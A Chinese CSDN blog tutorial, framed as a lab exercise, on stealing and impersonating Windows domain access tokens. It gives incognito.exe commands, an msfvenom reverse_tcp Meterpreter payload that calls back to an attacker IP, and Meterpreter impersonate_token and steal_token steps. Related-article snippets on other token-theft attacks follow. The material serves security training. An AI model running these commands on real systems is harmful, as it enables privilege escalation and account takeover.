域环境token窃取

最新推荐文章于 2024-05-14 09:59:49 发布
最新推荐文章于 2024-05-14 09:59:49 发布
阅读量376 收藏 1
点赞数 2
分类专栏: 内网域环境 文章标签: 安全 web安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nicai321/article/details/122552888
版权

文中主要讲解内网域环境,通过学习掌握域环境,更快知晓内网工作原理。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

域环境token窃取

令牌(token)是系统的临时秘钥,相当于账号和密码,用来决定是否允许这次请求和判断这次请求是属于哪一个用户的。它允许你在不提供密码或其他凭证的前提下,访问网络和系统资源,这些令牌将持续存在于系统中,除非系统重新启动。令牌最大的特点就是随机性,不可预测,黑客或软件无法猜测出令牌。
令牌(token)可以假冒,当我们需要域管理员操作权限时,就可以通过假冒域管理员的令牌进行攻击:
这里我们主要说访问令牌(Access Token),在windows中Access Token分为两种:授权令牌(Delegation Token)和模拟令牌(Impresonation Token) ;它们之前的区别就在于前者属于交互式会话登陆,而后者属于非交互的会话,两种Token在系统重启后会清除,但前者的Token用户在注销后,会变成后者。

Access Token的窃取和利用

此方法需要administrator管理员权限,当我们如果只是一个webshell或者user组权限时,是需要先进行提权操作。

本地使用incognito

程序地址:
https://labs.mwrinfosecurity.com/assets/BlogFiles/incognito2.zip
使用incognito来进行令牌窃取:
将Access Token进行列举:
从图上可以看出域用户权限是无法列举Access Token
在这里插入图片描述
使用本地administrator组权限,进行Access Token列举:

incognito.exe list_tokens -u

在这里插入图片描述
复制token名来进行模拟其他用户:
提权至系统管理员组权限;

incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe #提权至system
exit #退回当前权限

在这里插入图片描述

MSF中使用incognito模块

msf生成后门:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.20 LPORT=4444 -f exe > msf.exe

msf开启监听:

msfconsole
use exploit/multi/handler
use set payload windows/x64/meterpreter/reverse_tcp
use set LHOST 192.168.1.20
use set LPORT 4444 #默认就是4444 
exploit

成功反弹:
在这里插入图片描述
获取本地管理员权限后,进入incognito模块:

use incognito #进入 incognito 模块
list_tokens -u #列举令牌
impersonate_token 12SERVER-01\Administrator #假冒 12server-01\adminstrator 的令牌
impersonate_token moonsec\\test #假冒 moonsec\test的令牌
impersonate_token "NT AUTHORITY\SYSTEM" #假冒 System 的令牌
rev2self #返回之前的tonken

在这里插入图片描述
通过进程来同样可以窃取令牌:

steal_token PID #根据PID号来窃取

在这里插入图片描述

全局变量Global
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
渗透完全技巧.pdf
10-03
渗透】是针对Windows环境进行的一种高级攻击技术,目的是控制控制器,从而获取整个网络的控制权。【内网横向】是指在获得初步权限后,在内网中进一步扩散影响力,【权限维持】则是指在成功入侵后保持长期的...
第一百一十课:窃取,伪造模拟各种windows访问令牌[token利用]1
08-03
在确认目标系统位于环境中时,攻击者可能会寻找管理员权限。传统的方法是获取管理员的密码或哈希值,然后通过WMI或net use等手段进行登录。然而,通过**窃取和伪造访问令牌**,攻击者可以在无需明文密码或哈希...
内网渗透----Token 窃取与利用
浅笑996的博客
12-03 2244
0x00 前言 在之前的文章《渗透技巧——程序的降权启动》介绍了使用 SelectMyParent 降权的方法,本质上是通过 token 窃取实现的。这一次将要对 token 窃取和利用做进一步介绍,测试常用工具,分享利用技巧。 0x01 简介 本文将要介绍以下内容 ; · Token 简介 · Metasploit 中的 incognito · Windows 平台下的 incognito · ...
CSS注入窃取token
BerL1n
01-27 973
关于css注入是头一次看到,这里参考各师傅学习一下。 窃取input标签中的token 假设我们有一个php页面 <?php $token1 = md5($_SERVER['HTTP_USER_AGENT']); $token2 = md5($token1); ?> <!doctype html><meta charset=utf-8> <input ty...
如何确保您的Token安全:防范常见威胁与最佳实践
最新发布
fudaihb的博客
05-14 1732
Token安全是网络安全领的一个重要方面,尤其是在现代应用程序中,token常常用于身份验证和会话管理。本文将探讨如何保护token不受常见威胁的侵害,并提供一些最佳实践来增强token的安全性。
AccessToken窃取与利用
qq_63527808的博客
01-20 547
注: 两种 token 只在系统重启后清除具有 Delegation token 的用户在注销后,该 Token 将变成Impersonation token,依旧有效。(1)Delegation Token:授权令牌,它支持交互式会话登录(例如本地用户直接登录、远程桌面登录访问)(2)Impresonation Token:模拟令牌,它是非交互的会话(例如使用net use。上述此处进行模拟:1、先登录用户,注销后登录管理员账户。二、在 Windows 下使用工具。三、在 MSF 中使用。
【安全】免密登陆SQLSERVER 之 Token 窃取
dzqxwzoe的博客
01-06 166
接下来就说下我日常划水中遇到的这个问题:划水的机器是一太xp系统 存在 445 漏洞 二话不说上去就是一顿怼,怼成功后上去就是一顿操作,搞完发现我解不开这个管理员密码,一阵心凉,到手的数据就这样飞啦?然后想到了Token(怎么想到token的呢这个过程说不清楚),既然想到了方法二话不说打开虚拟机测试下看看能行否。意淫:Psexec 连接过产生Token ( 如果没有明文密码只有哈希的情况下哈希注入了解下)在我划水的时候就是用的 Psexec ( 因为445后们被我删除了,不想在怼了怕把系统玩坏 :)
Token 安全登陆防止窃取
weixin_30677617的博客
08-03 2373
HTTP 协议是无状态的 在web中使用cookie+session的技术来保持用户登陆的状态 移动端使用token来保持用户登陆状态由于token在网络中传输,很容易被 中间人获取,进而模拟用户进行其他相关操作 解决办法: 服务器端 响应头增加随机字符串 CSRF_TOKEN=xxxxxxxxxxx(每次请求都不同) 客户端 客户端和服务端 保...
SSO_same_domain
01-11
2. **Cookie机制**:SSO在同环境下通常利用Cookie来传递和验证用户的身份信息。当用户在主应用登录后,服务器会设置一个包含身份信息的Cookie,并将其发送到客户端。之后,当用户访问其他同应用时,浏览器会自动...
由浅入深的渗透系列一(下)1
08-03
6. **Token窃取**:攻击者可以通过窃取用户的访问令牌来提升权限,无需知道密码。这通常涉及到使用Meterpreter等工具来执行相关模块。 7. **Hash传递**:MSF可以用来进行哈希传递攻击,通过获取的NTLM哈希值尝试...
php的sso单点登录实现方法
12-18
3. **callback地址接收SSO的COOKIE并设置在当前下**: 原应用的callback页面接收到带有SSID(Single Sign-On Identifier)的请求后,会在本地设置这个COOKIE,确保该用户在当前应用下已经登录。然后,callback...
MSF令牌窃取
qq_53365842的博客
04-28 1688
令牌简介及原理 ● 令牌就是系统的临时密钥,相当于账户名和密码,原来决定是否允许这次请求和判断是属于哪一个用户的,他允许你不提供密码或其他凭证的前提下访问网络和系统资源 ● 令牌最大的特点就是随机性,不可预测,一般黑客或软件无法猜测出来 ● 令牌有很多种: 访问令牌(Access Token)表示访问和控制操作主题的系统对象 密保令牌(Security Tocken)是一种计算机身份校验的物理设备 会话令牌(Session Tocken)的交互会话中唯一的身份标识符 实战利用 (1)先把目标打下来 (.
控权限维持
wuxinweii的博客
12-01 3802
DSRM后门: 目录服务恢复模式(DSRM,Directory Services Restore Mode),是Windows服务器控制器的安全模式启动选项。DSRM允许管理员用来修复或还原修复或重建活动目录数据库。活动目录安装后,安装向导提示管理员选择一个DSRM密码。有了密码,管理员可以防护数据库后门,避免之后出问题。但是它不提供访问或任何服务。如果DSRM密码忘了,可以使用命令行工具NTDSUtil进行更改。 在渗透测试中,可以使用DSRM对环境进行持久化操作。适用版本为windows serv
渗透篇】windows主机提权之令牌窃取
shelter1234567的博客
07-16 402
Windows令牌窃取(Windows token stealing)是一种攻击技术,用于获取用户的访问权限并执行特权操作。在Windows操作系统中,每个用户登录后都会分配一个令牌(token),该令牌包含了用户的安全标识和权限信息。令牌用于验证用户对系统资源的访问权限。​ 令牌假冒(Token impersonation)是一种攻击技术,攻击者通过伪装成其他用户或进程的身份来获取访问权限。在计算机系统中,令牌是用于验证用户身份和授权访问资源的一种机制。
内网渗透:七、windows组策略首选项提权
liu_jia_liang的博客
03-01 2607
一、sysvol目录 SYSVOL是所有经过身份验证的用户具有读访问权限的Active Directory中的范围共享。SYSVOL是指存储公共文件服务器副本的共享文件夹,它们在中所有的控制器之间复制。 Sysvol文件夹是安装AD时创建的,它用来存放GPO、Script等信息。同时,存放在Sysvol文件夹中的信息,会复制到中所有DC上。SYSVOL包含登录脚本,组策略数据以及需要在任何有控制器的任何地方可用的其他范围数据(因为SYSVOL在所有控制器之间自动同步并共享)。所有...
内网渗透之环境探索和简单提权
m0_70349048的博客
03-31 364
因为控可以登录内所有管辖的主机,因此登录过程中的密码会被记录下来,即winlog进程把密码拿到,发给后面的lasss,然后还会进行hash加密保存到SAM中。假如我么已经拿下了一个普通主机,想要登录权限更大的控,我们的目的就是获取控的密码,明文更好,hash后的也能用。内主机就作为普通的机器,只有普通的权限,一般我们拿下跳板机之后,就会拿下普通的主机,然后想办法提权或者进入控。控服务器是管理环境的,相当于“领导”,可以划分,提供服务,并且可以登录内的任何一台机器。
Windows令牌的窃取探究
A_991128a的博客
09-13 103
本期技术分享,小星将与大家以“Windows令牌的窃取”为题展开讨论,从令牌分类、Access Token窃取与利用以及CS利用三个方面展开叙述。
Windows提权方法简单总结_systminfo ,根据系统补丁提权
2401_84296945的博客
04-26 691
写了好多天的windows与linux提权技巧,现在做下简单的总结。提权是后渗透重要的一环节,在权限较低的情况下,我们在进行一些操作如读取/写入敏感文件、权限维持等会受到束缚,所以需要提权。在实际中我们会碰到工作组和环境,工作组环境我们提权的目的是从普通用户权限到管理员或者system权限。而环境中我们通常是从用户到管理员权限。
CVE-2020-1472(内提权)
p01son的博客
08-02 670
CVE-2020-1472(内提权) Created: July 7, 2021 5:25 PM 文章目录CVE-2020-1472(内提权)简介影响范围复现环境复现过程恢复原机器hash参考 简介 CVE-2020-1472是一个windows控中严重的远程权限提升漏洞,是因为微软在Netlogon协议中没有正确使用加密算法而导致的漏洞。由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误的将IV设置为全零,这使得攻击者在明文(client chanllenge)、IV等要素可控的
CobaltStrike实战案例集锦: token窃取、令牌制作、Kerberos认证等
在CobaltStrike中,可以使用steal_token命令来窃取目标主机的Token,以获取管理员权限。然后,可以使用窃取Token来访问控或本地管理员的资源。需要注意的是,在登录失败时,需要先恢复身份。 2.制作Token并访问...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

全局变量Global

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值